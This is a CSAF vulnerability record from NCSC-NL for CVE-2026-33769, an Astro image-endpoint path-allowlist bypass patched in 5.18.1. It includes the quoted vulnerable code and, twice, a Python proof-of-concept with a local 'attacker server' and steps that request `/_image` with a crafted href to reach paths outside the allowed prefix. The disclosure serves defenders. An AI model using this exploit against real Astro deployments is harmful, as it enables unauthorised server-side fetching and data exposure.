{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-33769", "tracking": { "current_release_date": "2026-03-27T00:22:13.071794Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-33769", "initial_release_date": "2026-03-24T20:53:18.434010Z", "revision_history": [ { "date": "2026-03-24T20:53:18.434010Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (1).| CWES updated (1)." }, { "date": "2026-03-24T20:53:21.127355Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-24T20:53:44.848335Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (1).| CWES updated (1)." }, { "date": "2026-03-24T20:53:47.705389Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-24T20:54:24.154152Z", "number": "5", "summary": "Unknown change." }, { "date": "2026-03-26T00:49:59.917103Z", "number": "6", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-26T00:50:02.094102Z", "number": "7", "summary": "NCSC Score updated." }, { "date": "2026-03-26T12:25:13.080198Z", "number": "8", "summary": "CVSS created.| Products created (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-03-26T12:25:20.228396Z", "number": "9", "summary": "NCSC Score updated." }, { "date": "2026-03-26T19:45:18.810574Z", "number": "10", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)." }, { "date": "2026-03-26T19:45:24.872660Z", "number": "11", "summary": "NCSC Score updated." }, { "date": "2026-03-27T00:21:57.373295Z", "number": "12", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1)." }, { "date": "2026-03-27T00:21:59.526581Z", "number": "13", "summary": "NCSC Score updated." } ], "status": "interim", "version": "13" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/>=2.10.10|<5.18.1", "product": { "name": "vers:unknown/>=2.10.10|<5.18.1", "product_id": "CSAFPID-5917043", "product_identification_helper": { "cpe": "cpe:2.3:a:astro:astro:*:*:*:*:*:node.js:*:*" } } } ], "category": "product_name", "name": "astro" } ], "category": "vendor", "name": "astro" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/>=2.10.10|<5.18.1", "product": { "name": "vers:unknown/>=2.10.10|<5.18.1", "product_id": "CSAFPID-5902786" } } ], "category": "product_name", "name": "astro" } ], "category": "vendor", "name": "withastro" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-33769", "cwe": { "id": "CWE-183", "name": "Permissive List of Allowed Inputs" }, "notes": [ { "category": "description", "text": "Astro is a web framework. From version 2.10.10 to before version 5.18.1, this issue concerns Astro's remotePatterns path enforcement for remote URLs used by server-side fetchers such as the image optimization endpoint. The path matching logic for /* wildcards is unanchored, so a pathname that contains the allowed prefix later in the path can still match. As a result, an attacker can fetch paths outside the intended allowlisted prefix on an otherwise allowed host. This issue has been patched in version 5.18.1.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33769" }, { "category": "description", "text": "Astro is a web framework. From version 2.10.10 to before version 5.18.1, this issue concerns Astro's remotePatterns path enforcement for remote URLs used by server-side fetchers such as the image optimization endpoint. The path matching logic for /* wildcards is unanchored, so a pathname that contains the allowed prefix later in the path can still match. As a result, an attacker can fetch paths outside the intended allowlisted prefix on an otherwise allowed host. This issue has been patched in version 5.18.1.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33769.json" }, { "category": "description", "text": "## Summary\nThis issue concerns Astro's `remotePatterns` path enforcement for remote URLs used by server-side fetchers such as the image optimization endpoint. The path matching logic for `/*` wildcards is unanchored, so a pathname that contains the allowed prefix later in the path can still match. As a result, an attacker can fetch paths outside the intended allowlisted prefix on an otherwise allowed host. In our PoC, both the allowed path and a bypass path returned 200 with the same SVG payload, confirming the bypass.\n\n## Impact\nAttackers can fetch unintended remote resources on an allowlisted host via the image endpoint, expanding SSRF/data exposure beyond the configured path prefix.\n\n## Description\nTaint flow: request -> `transform.src` -> `isRemoteAllowed()` -> `matchPattern()` -> `matchPathname()`\n\nUser-controlled `href` is parsed into `transform.src` and validated via `isRemoteAllowed()`:\n\nSource: https://github.com/withastro/astro/blob/e0f1a2b3e4bc908bd5e148c698efb6f41a42c8ea/packages/astro/src/assets/endpoint/generic.ts#L43-L56\n\n```ts\nconst url = new URL(request.url);\nconst transform = await imageService.parseURL(url, imageConfig);\n\nconst isRemoteImage = isRemotePath(transform.src);\n\nif (isRemoteImage && isRemoteAllowed(transform.src, imageConfig) === false) {\n return new Response('Forbidden', { status: 403 });\n}\n```\n\n`isRemoteAllowed()` checks each `remotePattern` via `matchPattern()`:\n\nSource: https://github.com/withastro/astro/blob/e0f1a2b3e4bc908bd5e148c698efb6f41a42c8ea/packages/internal-helpers/src/remote.ts#L15-L21\n\n```ts\nexport function matchPattern(url: URL, remotePattern: RemotePattern): boolean {\n return (\n matchProtocol(url, remotePattern.protocol) &&\n matchHostname(url, remotePattern.hostname, true) &&\n matchPort(url, remotePattern.port) &&\n matchPathname(url, remotePattern.pathname, true)\n );\n}\n```\n\nThe vulnerable logic in `matchPathname()` uses `replace()` without anchoring the prefix for `/*` patterns:\n\nSource: https://github.com/withastro/astro/blob/e0f1a2b3e4bc908bd5e148c698efb6f41a42c8ea/packages/internal-helpers/src/remote.ts#L85-L99\n\n```ts\n} else if (pathname.endsWith('/*')) {\n const slicedPathname = pathname.slice(0, -1); // * length\n const additionalPathChunks = url.pathname\n .replace(slicedPathname, '')\n .split('/')\n .filter(Boolean);\n return additionalPathChunks.length === 1;\n}\n```\n\n**Vulnerable code flow:**\n1. `isRemoteAllowed()` evaluates `remotePatterns` for a requested URL.\n2. `matchPathname()` handles `pathname: \"/img/*\"` using `.replace()` on the URL path.\n3. A path such as `/evil/img/secret` incorrectly matches because `/img/` is removed even when it's not at the start.\n4. The image endpoint fetches and returns the remote resource.\n\n## PoC\n\nThe PoC starts a local attacker server and configures remotePatterns to allow only `/img/*`. It then requests the image endpoint with two URLs: an allowed path and a bypass path with `/img/` in the middle. Both requests returned the SVG payload, showing the path restriction was bypassed.\n\n### Vulnerable config\n```js\nimport { defineConfig } from 'astro/config';\nimport node from '@astrojs/node';\n\nexport default defineConfig({\n output: 'server',\n adapter: node({ mode: 'standalone' }),\n image: {\n remotePatterns: [\n { protocol: 'https', hostname: 'cdn.example', pathname: '/img/*' },\n { protocol: 'http', hostname: '127.0.0.1', port: '9999', pathname: '/img/*' },\n ],\n },\n});\n```\n\n### Affected pages\nThis PoC targets the `/_image` endpoint directly; no additional pages are required.\n\n### PoC Code\n```python\nimport http.client\nimport json\nimport urllib.parse\n\nHOST = \"127.0.0.1\"\nPORT = 4321\n\ndef fetch(path: str) -> dict:\n conn = http.client.HTTPConnection(HOST, PORT, timeout=10)\n conn.request(\"GET\", path, headers={\"Host\": f\"{HOST}:{PORT}\"})\n resp = conn.getresponse()\n body = resp.read(2000).decode(\"utf-8\", errors=\"replace\")\n conn.close()\n return {\n \"path\": path,\n \"status\": resp.status,\n \"reason\": resp.reason,\n \"headers\": dict(resp.getheaders()),\n \"body_snippet\": body[:400],\n }\n\nallowed = urllib.parse.quote(\"http://127.0.0.1:9999/img/allowed.svg\", safe=\"\")\nbypass = urllib.parse.quote(\"http://127.0.0.1:9999/evil/img/secret.svg\", safe=\"\")\n\n# Both pass, second should fail\n\nresults = {\n \"allowed\": fetch(f\"/_image?href={allowed}&f=svg\"),\n \"bypass\": fetch(f\"/_image?href={bypass}&f=svg\"),\n}\n\nprint(json.dumps(results, indent=2))\n```\n\n### Attacker server\n```python\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\n\nHOST = \"127.0.0.1\"\nPORT = 9999\n\nPAYLOAD = \"\"\"\n OK\n\n\"\"\"\n\nclass Handler(BaseHTTPRequestHandler):\n def do_GET(self):\n print(f\">>> {self.command} {self.path}\")\n if self.path.endswith(\".svg\") or \"/img/\" in self.path:\n self.send_response(200)\n self.send_header(\"Content-Type\", \"image/svg+xml\")\n self.send_header(\"Cache-Control\", \"no-store\")\n self.end_headers()\n self.wfile.write(PAYLOAD.encode(\"utf-8\"))\n return\n\n self.send_response(200)\n self.send_header(\"Content-Type\", \"text/plain\")\n self.end_headers()\n self.wfile.write(b\"ok\")\n\n def log_message(self, format, *args):\n return\n\nif __name__ == \"__main__\":\n server = HTTPServer((HOST, PORT), Handler)\n print(f\"HTTP logger listening on http://{HOST}:{PORT}\")\n server.serve_forever()\n```\n\n### PoC Steps\n1. Bootstrap default Astro project.\n2. Add the vulnerable config and attacker server.\n3. Build the project.\n4. Start the attacker server.\n5. Start the Astro server.\n6. Run the PoC.\n7. Observe the console output showing both the allowed and bypass requests returning the SVG payload.", "title": "github - https://api.github.com/advisories/GHSA-g735-7g2w-hh3f" }, { "category": "description", "text": "## Summary\nThis issue concerns Astro's `remotePatterns` path enforcement for remote URLs used by server-side fetchers such as the image optimization endpoint. The path matching logic for `/*` wildcards is unanchored, so a pathname that contains the allowed prefix later in the path can still match. As a result, an attacker can fetch paths outside the intended allowlisted prefix on an otherwise allowed host. In our PoC, both the allowed path and a bypass path returned 200 with the same SVG payload, confirming the bypass.\n\n## Impact\nAttackers can fetch unintended remote resources on an allowlisted host via the image endpoint, expanding SSRF/data exposure beyond the configured path prefix.\n\n## Description\nTaint flow: request -> `transform.src` -> `isRemoteAllowed()` -> `matchPattern()` -> `matchPathname()`\n\nUser-controlled `href` is parsed into `transform.src` and validated via `isRemoteAllowed()`:\n\nSource: https://github.com/withastro/astro/blob/e0f1a2b3e4bc908bd5e148c698efb6f41a42c8ea/packages/astro/src/assets/endpoint/generic.ts#L43-L56\n\n```ts\nconst url = new URL(request.url);\nconst transform = await imageService.parseURL(url, imageConfig);\n\nconst isRemoteImage = isRemotePath(transform.src);\n\nif (isRemoteImage && isRemoteAllowed(transform.src, imageConfig) === false) {\n return new Response('Forbidden', { status: 403 });\n}\n```\n\n`isRemoteAllowed()` checks each `remotePattern` via `matchPattern()`:\n\nSource: https://github.com/withastro/astro/blob/e0f1a2b3e4bc908bd5e148c698efb6f41a42c8ea/packages/internal-helpers/src/remote.ts#L15-L21\n\n```ts\nexport function matchPattern(url: URL, remotePattern: RemotePattern): boolean {\n return (\n matchProtocol(url, remotePattern.protocol) &&\n matchHostname(url, remotePattern.hostname, true) &&\n matchPort(url, remotePattern.port) &&\n matchPathname(url, remotePattern.pathname, true)\n );\n}\n```\n\nThe vulnerable logic in `matchPathname()` uses `replace()` without anchoring the prefix for `/*` patterns:\n\nSource: https://github.com/withastro/astro/blob/e0f1a2b3e4bc908bd5e148c698efb6f41a42c8ea/packages/internal-helpers/src/remote.ts#L85-L99\n\n```ts\n} else if (pathname.endsWith('/*')) {\n const slicedPathname = pathname.slice(0, -1); // * length\n const additionalPathChunks = url.pathname\n .replace(slicedPathname, '')\n .split('/')\n .filter(Boolean);\n return additionalPathChunks.length === 1;\n}\n```\n\n**Vulnerable code flow:**\n1. `isRemoteAllowed()` evaluates `remotePatterns` for a requested URL.\n2. `matchPathname()` handles `pathname: \"/img/*\"` using `.replace()` on the URL path.\n3. A path such as `/evil/img/secret` incorrectly matches because `/img/` is removed even when it's not at the start.\n4. The image endpoint fetches and returns the remote resource.\n\n## PoC\n\nThe PoC starts a local attacker server and configures remotePatterns to allow only `/img/*`. It then requests the image endpoint with two URLs: an allowed path and a bypass path with `/img/` in the middle. Both requests returned the SVG payload, showing the path restriction was bypassed.\n\n### Vulnerable config\n```js\nimport { defineConfig } from 'astro/config';\nimport node from '@astrojs/node';\n\nexport default defineConfig({\n output: 'server',\n adapter: node({ mode: 'standalone' }),\n image: {\n remotePatterns: [\n { protocol: 'https', hostname: 'cdn.example', pathname: '/img/*' },\n { protocol: 'http', hostname: '127.0.0.1', port: '9999', pathname: '/img/*' },\n ],\n },\n});\n```\n\n### Affected pages\nThis PoC targets the `/_image` endpoint directly; no additional pages are required.\n\n### PoC Code\n```python\nimport http.client\nimport json\nimport urllib.parse\n\nHOST = \"127.0.0.1\"\nPORT = 4321\n\ndef fetch(path: str) -> dict:\n conn = http.client.HTTPConnection(HOST, PORT, timeout=10)\n conn.request(\"GET\", path, headers={\"Host\": f\"{HOST}:{PORT}\"})\n resp = conn.getresponse()\n body = resp.read(2000).decode(\"utf-8\", errors=\"replace\")\n conn.close()\n return {\n \"path\": path,\n \"status\": resp.status,\n \"reason\": resp.reason,\n \"headers\": dict(resp.getheaders()),\n \"body_snippet\": body[:400],\n }\n\nallowed = urllib.parse.quote(\"http://127.0.0.1:9999/img/allowed.svg\", safe=\"\")\nbypass = urllib.parse.quote(\"http://127.0.0.1:9999/evil/img/secret.svg\", safe=\"\")\n\n# Both pass, second should fail\n\nresults = {\n \"allowed\": fetch(f\"/_image?href={allowed}&f=svg\"),\n \"bypass\": fetch(f\"/_image?href={bypass}&f=svg\"),\n}\n\nprint(json.dumps(results, indent=2))\n```\n\n### Attacker server\n```python\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\n\nHOST = \"127.0.0.1\"\nPORT = 9999\n\nPAYLOAD = \"\"\"\n OK\n\n\"\"\"\n\nclass Handler(BaseHTTPRequestHandler):\n def do_GET(self):\n print(f\">>> {self.command} {self.path}\")\n if self.path.endswith(\".svg\") or \"/img/\" in self.path:\n self.send_response(200)\n self.send_header(\"Content-Type\", \"image/svg+xml\")\n self.send_header(\"Cache-Control\", \"no-store\")\n self.end_headers()\n self.wfile.write(PAYLOAD.encode(\"utf-8\"))\n return\n\n self.send_response(200)\n self.send_header(\"Content-Type\", \"text/plain\")\n self.end_headers()\n self.wfile.write(b\"ok\")\n\n def log_message(self, format, *args):\n return\n\nif __name__ == \"__main__\":\n server = HTTPServer((HOST, PORT), Handler)\n print(f\"HTTP logger listening on http://{HOST}:{PORT}\")\n server.serve_forever()\n```\n\n### PoC Steps\n1. Bootstrap default Astro project.\n2. Add the vulnerable config and attacker server.\n3. Build the project.\n4. Start the attacker server.\n5. Start the Astro server.\n6. Run the PoC.\n7. Observe the console output showing both the allowed and bypass requests returning the SVG payload.", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/npm%2FGHSA-g735-7g2w-hh3f.json?alt=media" }, { "category": "other", "text": "0.00085", "title": "EPSS" }, { "category": "other", "text": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "title": "CVSSV4" }, { "category": "other", "text": "2.9", "title": "CVSSV4 base score" }, { "category": "other", "text": "3.8", "title": "NCSC Score" }, { "category": "other", "text": "There is exploit data available from source Nvd, Is related to (a version of) an uncommon product, The value of the most recent EPSS score", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5902786", "CSAFPID-5917043" ] }, "references": [ { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33769" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33769.json" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-g735-7g2w-hh3f" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/npm%2FGHSA-g735-7g2w-hh3f.json?alt=media" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/withastro/astro/security/advisories/GHSA-g735-7g2w-hh3f" }, { "category": "external", "summary": "Reference - github; osv", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33769" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-g735-7g2w-hh3f" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM" }, "products": [ "CSAFPID-5902786", "CSAFPID-5917043" ] } ], "title": "CVE-2026-33769" } ] }